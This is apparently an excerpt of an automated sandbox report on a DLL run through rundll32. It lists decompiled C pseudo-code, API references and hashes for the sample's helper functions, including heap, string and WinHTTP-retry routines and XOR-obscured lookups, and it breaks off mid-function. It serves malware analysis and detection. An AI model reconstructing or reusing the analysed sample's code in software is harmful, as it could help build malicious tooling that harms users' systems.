Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 0df75f1a8ae93400b8b1da9ab92a740de32d7b656464be583c431f3c0cb562ae
Instruction ID: c15b01847e7d10f9c73d69278e969871f328b643abb94e8faebc9abce42062b1
Opcode Fuzzy Hash: 0df75f1a8ae93400b8b1da9ab92a740de32d7b656464be583c431f3c0cb562ae
Instruction Fuzzy Hash: 9C213D79A0061AAFCB00CBA4C888D9AB779FFC8714B148698F905EB355D675ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04445A96, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04445ABE

Part of subcall function 04445722: SysFreeString.OLEAUT32(?), ref: 04445801

SafeArrayDestroy.OLEAUT32(?), ref: 04445B0B

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: e9d17d6eb7a39dd9261eb29a0e6e6d969cd9acf808a44ac564427a447ab01a32
Instruction ID: 527085c12967f293b4898956e70f14cb4061490e772dfb58f6051500407ba599
Opcode Fuzzy Hash: e9d17d6eb7a39dd9261eb29a0e6e6d969cd9acf808a44ac564427a447ab01a32
Instruction Fuzzy Hash: 84115E76A00509BFEF11DFA8C844EDEBBB8EB48350F008025FA04E6161E375AA15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04442E9F, Relevance: 3.0, APIs: 2, Instructions: 47
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04442E9F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E04442DDF(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E04445FED(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E0444543F(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x444a290, 0, _t23);
				}
				return _t20;
			}

0x04442e9f
0x04442eb0
0x04442eb4
0x04442f0d
0x04442eb6
0x04442ebd
0x04442ec3
0x04442ec7
0x04442ecc
0x04442ed0
0x04442ed6
0x04442ee6
0x04442ef8
0x04442ef8
0x04442f03
0x04442f03
0x04442f14

APIs

Part of subcall function 04442DDF: lstrlen.KERNEL32(?,00000000,05349CC0,7742C740,04442908,05349EC5,044464C9,044464C9,?,044464C9,?,69B25F44,E8FA7DD7,00000000), ref: 04442DE6
Part of subcall function 04442DDF: mbstowcs.NTDLL ref: 04442E0F
Part of subcall function 04442DDF: memset.NTDLL ref: 04442E21

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0534930C), ref: 04442ED6
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74B05520,00000008,00000014,004F0053,0534930C), ref: 04442F03

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 1fdadcf834fd664700fe15ba7b8793bafaafc5118b5a5dfe9ee728f2256d7ec8
Instruction ID: 297b05a0df75130ad6f7464743810cf96a9c01f9d0eb9def61288eb7aa180b85
Opcode Fuzzy Hash: 1fdadcf834fd664700fe15ba7b8793bafaafc5118b5a5dfe9ee728f2256d7ec8
Instruction Fuzzy Hash: 5B018F36210209BBFF216F55DC44E9B7B7AFBC4744F40002AFA009A151EBB1E955E760

Uniqueness

Uniqueness Score: -1.00%

Function 044456B5, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(04441A9B), ref: 044456CF

Part of subcall function 04445722: SysFreeString.OLEAUT32(?), ref: 04445801

SysFreeString.OLEAUT32(00000000), ref: 0444570F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 24e12893220d0c4ef6b35d8982c62a9d583ff999c9c402dbbdea702fac65e953
Instruction ID: 76d8fe82e13097d0d92487b3929ec03817683ded74faefc4352b04626963c559
Opcode Fuzzy Hash: 24e12893220d0c4ef6b35d8982c62a9d583ff999c9c402dbbdea702fac65e953
Instruction Fuzzy Hash: CF014F7651050ABBEF119F69D80899FBBB8FF88310F004125FA05A6220D774ED15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04442747, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x444a294) == 0) {
						E0444760E();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x444a294) == 1) {
						_t10 = E044424B6(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x0444274e
0x0444274f
0x04442752
0x04442784
0x04442786
0x04442786
0x04442754
0x04442755
0x0444276a
0x04442771
0x04442773
0x04442773
0x04442771
0x04442755
0x0444278e

APIs

InterlockedIncrement.KERNEL32(0444A294), ref: 0444275C

Part of subcall function 044424B6: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 044424CB

InterlockedDecrement.KERNEL32(0444A294), ref: 0444277C

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: e74b751d2d973998b082bd245a595619431e12fcad8b298becbd71a1252bb7a8
Instruction ID: 95002c1fecb1849deb0f04f22619e7d19002f3cf7cc0967baf1e92b8c5caca74
Opcode Fuzzy Hash: e74b751d2d973998b082bd245a595619431e12fcad8b298becbd71a1252bb7a8
Instruction Fuzzy Hash: 6FE04F3534493357BF32ABB49C48F5FAA54BBC0BC4F115AABB580D1210D694F8419691

Uniqueness

Uniqueness Score: -1.00%

Function 04445F66, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E04445F66(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7024e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x04445f6d
0x04445f7a
0x04445f7c
0x04445f7f
0x04445fc4
0x04445fcc
0x04445fd2
0x04445fd6
0x00000000
0x00000000
0x04445f83
0x04445f8e
0x04445f91
0x04445fc2
0x00000000
0x00000000
0x04445f93
0x04445f96
0x04445f9d
0x04445fa1
0x04445faa
0x04445fb2
0x04445fe0
0x04445fb4
0x04445fb4
0x00000000
0x04445fb4
0x04445fb2
0x04445f9d
0x04445fe3
0x04445fea
0x04445fea
0x00000000

APIs

GetLastError.KERNEL32 ref: 04445F83
GetLastError.KERNEL32 ref: 04445FDA

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bba44afc64a24ea6d9e5b3723e21a83bb8c298d47696e138f99dc6aa933ab431
Instruction ID: 61ac80bf55b233e463d46d2780403b223aa045bc3e53d795001b7ab38d14b341
Opcode Fuzzy Hash: bba44afc64a24ea6d9e5b3723e21a83bb8c298d47696e138f99dc6aa933ab431
Instruction Fuzzy Hash: 25015E75900119FBFF209F96D848D9FBBB8EBC4740F108066EA04D6280D774AA40DB62

Uniqueness

Uniqueness Score: -1.00%

Function 702E1A55, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E702E1A55(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E702E1051( &_v8,  &_v12,  *0x702e41cc ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E702E169E(_t22, _v8,  *0x702e41cc ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_v12 = E702E1813(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x702e4190, 0, _v8);
				}
				return _t25;
			}

0x702e1a55
0x702e1a58
0x702e1a59
0x702e1a6f
0x702e1a78
0x702e1a7d
0x702e1a96
0x702e1a7f
0x702e1a92
0x702e1a92
0x702e1a9a
0x702e1aa4
0x702e1aac
0x702e1ab4
0x702e1ab6
0x702e1ab6
0x702e1ab4
0x702e1ac6
0x702e1ac6
0x702e1ad1

APIs

StrStrIA.KERNELBASE(00000000,702E1EEC,?,702E1EEC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E1AAC
HeapFree.KERNEL32(00000000,?,?,702E1EEC,?,00000000,00000001,?,?,?,702E1EEC), ref: 702E1AC6

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f742c3a36789b2ad0e7e2cf590d401e4216659d8725321201ae200c3e0d6cd73
Instruction ID: 56296a65e37d7271dc18d7ed30320277af81313b9b37aa4f7eced6ae18f105cd
Opcode Fuzzy Hash: f742c3a36789b2ad0e7e2cf590d401e4216659d8725321201ae200c3e0d6cd73
Instruction Fuzzy Hash: B4015E77A81115BFCB018BA2CD4DABE77BDAB44601B6041B5E906E7344E630DA50ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 044410C5, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E044410C5(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x444a290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x044410ca
0x044410cf
0x044410dd
0x044410e3
0x044410e7
0x04441158
0x044410e9
0x044410ed
0x044410f0
0x044410f3
0x044410fa
0x044410fb
0x044410fc
0x04441100
0x04441103
0x0444110a
0x04441110
0x04441111
0x04441111
0x04441118
0x04441119
0x0444111a
0x0444111e
0x0444112a
0x04441130
0x04441131
0x04441131
0x04441133
0x04441139
0x0444113b
0x04441140
0x04441141
0x04441141
0x04441147
0x04441150
0x04441152
0x04441155
0x04441164

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 044410DD

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7adafa4267cd955a8f3160bc93f9bb6a48fc48abdca2e6215a5113b334e67a03
Instruction ID: 40d2012f677b02c4a66d352ebc9693b7f4c2096b03860e0312a0aec7a4f83b7a
Opcode Fuzzy Hash: 7adafa4267cd955a8f3160bc93f9bb6a48fc48abdca2e6215a5113b334e67a03
Instruction Fuzzy Hash: B11136312853449FFB158F29C856BEA7BA5DB97358F14408AE4409B383C277954BC760

Uniqueness

Uniqueness Score: -1.00%

Function 0444528F, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E0444528F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x444a2d4; // 0xefd5a8
				_t4 = _t15 + 0x444b394; // 0x534893c
				_t20 = _t4;
				_t6 = _t15 + 0x444b124; // 0x650047
				_t17 = E04445722(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04445F0D(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x04445299
0x0444529b
0x044452a2
0x044452a3
0x044452a4
0x044452a5
0x044452ab
0x044452b0
0x044452b0
0x044452ba
0x044452cc
0x044452d3
0x04445302
0x044452d5
0x044452da
0x044452ff
0x044452dc
0x044452df
0x044452e6
0x044452f1
0x044452e8
0x044452eb
0x044452eb
0x044452f5
0x044452f5
0x044452da
0x04445309

APIs

Part of subcall function 04445722: SysFreeString.OLEAUT32(?), ref: 04445801

Part of subcall function 04445F0D: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044426D2,004F0053,00000000,?), ref: 04445F16
Part of subcall function 04445F0D: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044426D2,004F0053,00000000,?), ref: 04445F40
Part of subcall function 04445F0D: memset.NTDLL ref: 04445F54

SysFreeString.OLEAUT32(00000000), ref: 044452F5

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 3e7022f410c29b930fc5d432bef6fc943298fd195e715a3036e97a4101d700fb
Instruction ID: 4553c1bfa8760704548d99861f5a22945e6f3196cbf14439f2e8c877cddf298b
Opcode Fuzzy Hash: 3e7022f410c29b930fc5d432bef6fc943298fd195e715a3036e97a4101d700fb
Instruction Fuzzy Hash: 82017532500129BFEF119FA8DC04DAEF7B8FB84B50F404426E701E6161E770B911DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04444644, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E04444644(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E044410C5(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x444a2d4; // 0xefd5a8
						_t9 = _t17 + 0x444b9e8; // 0x444f4340
						_t20 = E044431A5( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x444a290, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x04444647
0x0444464d
0x044446a4
0x04444653
0x0444465e
0x04444663
0x04444667
0x04444674
0x0444467c
0x04444688
0x04444690
0x0444469a
0x0444469a
0x04444667
0x044446a9

APIs

Part of subcall function 044410C5: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 044410DD

Part of subcall function 044431A5: lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 044431D9
Part of subcall function 044431A5: StrStrA.SHLWAPI(00000000,?), ref: 044431E6
Part of subcall function 044431A5: RtlAllocateHeap.NTDLL(00000000,?), ref: 04443205

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04444845), ref: 0444469A

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: 62650985b71ea220c4e3268b2ca500326c8237b8b1bfbc1c2bac3034032434a7
Instruction ID: 0990f421db7afeca47a35153ed70c62a51b034aa5a1b1c7b95c8e664a70dc8af
Opcode Fuzzy Hash: 62650985b71ea220c4e3268b2ca500326c8237b8b1bfbc1c2bac3034032434a7
Instruction Fuzzy Hash: F9016D7A200508BFFF11CF45CC40E9BB7A9EB84744F10402AFA06962A0E735FA55EF50

Uniqueness

Uniqueness Score: -1.00%

Function 70300EF4, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__nh_malloc_dbg.LIBCMTD ref: 70300F0B

Part of subcall function 702F1800: __calloc_dbg_impl.LIBCMTD ref: 702F1827

__nh_malloc_dbg.LIBCMTD ref: 70301037
GetFileType.KERNEL32(?), ref: 70301147

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: __nh_malloc_dbg$FileType__calloc_dbg_impl
String ID:
API String ID: 1852854821-0
Opcode ID: 688e6c6d0dff29db669c6f4cf2cbf5bdb620b8cb41963a098d12bfab5d38bcf3
Instruction ID: ef31790d12546b0f62c814f987629a5f5a9ed168e124f7d5503b0c43d1c15b54
Opcode Fuzzy Hash: 688e6c6d0dff29db669c6f4cf2cbf5bdb620b8cb41963a098d12bfab5d38bcf3
Instruction Fuzzy Hash: 32E086B2F847089EE7308A65A806B5CB761E744776F60836EE6356B2C1DB7114008F41

Uniqueness

Uniqueness Score: -1.00%

Function 703288A0, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

_atexit.LIBCMTD ref: 703288BD

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: _atexit
String ID:
API String ID: 843483074-0
Opcode ID: 21a552b05c2c5b8a62acce679a93bca9df7ed4c2b63c10e6d6bbf4c90824078d
Instruction ID: 1e73bc5f62dc66bbe6e02ebb1ddae709ee372da0e927a35cfcedb9f12f23e466
Opcode Fuzzy Hash: 21a552b05c2c5b8a62acce679a93bca9df7ed4c2b63c10e6d6bbf4c90824078d
Instruction Fuzzy Hash: BAC08CB7B8020832E12012822C43F5D342983C0BA0E950110F98E2D2C4AC837820416B

Uniqueness

Uniqueness Score: -1.00%

Function 702F9600, Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 702F9607

Part of subcall function 702F9530: TlsGetValue.KERNEL32(7037C750,00000000), ref: 702F9545
Part of subcall function 702F9530: TlsGetValue.KERNEL32(7037C750,7037C74C), ref: 702F9566
Part of subcall function 702F9530: __crt_wait_module_handle.LIBCMTD ref: 702F957C
Part of subcall function 702F9530: GetProcAddress.KERNEL32(00000000,7032DA20), ref: 702F9596
Part of subcall function 702F9530: RtlEncodePointer.NTDLL(?), ref: 702F95B7

Memory Dump Source

Source File: 0000001C.00000002.736222143.00000000702EE000.00000020.00020000.sdmp, Offset: 702EE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702ee000_rundll32.jbxd

Similarity

API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 568403282-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: 8c160fb7bc8a6bffbc7a13d35ce107253ef59cb120991356032ff5f63fc7b8d1
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: E3A0126344430C23D00010923803F067A0D43C0574E580020F50C051413842B4248893

Uniqueness

Uniqueness Score: -1.00%

Function 044430D1, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044430D1(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x444a290, 0, _a4); // executed
				return _t2;
			}

0x044430dd
0x044430e3

APIs

RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2ad34cf624e729a42adfb23c31d575f4c3c19eca4d160f6d46bb1c4826108aca
Instruction ID: fce94f6805294a67796f0cc13d55ae4ba1f1ec97811c913134970f40d746a366
Opcode Fuzzy Hash: 2ad34cf624e729a42adfb23c31d575f4c3c19eca4d160f6d46bb1c4826108aca
Instruction Fuzzy Hash: 47B012B9344100ABFB128F10EE05F06BB22F7D0B01F004010B3081047082370C20FB15

Uniqueness

Uniqueness Score: -1.00%

Function 04441EF5, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04441EF5(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x444a290, 0, _a4); // executed
				return _t2;
			}

0x04441f01
0x04441f07

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 97247ac2657258288c1b7c2f1a7c21fe39c96f96cb4e7f863e923cde39e00181
Instruction ID: dee5a60ba4a02b529f2458656fe3db05d3bcc54df3f180b99b542caf3a369ffe
Opcode Fuzzy Hash: 97247ac2657258288c1b7c2f1a7c21fe39c96f96cb4e7f863e923cde39e00181
Instruction Fuzzy Hash: 22B01279254100ABFB128B10ED04F06BB32F7D0B00F104010B2041046086360C20FB04

Uniqueness

Uniqueness Score: -1.00%

Function 0444749F, Relevance: 1.3, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0444749F(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
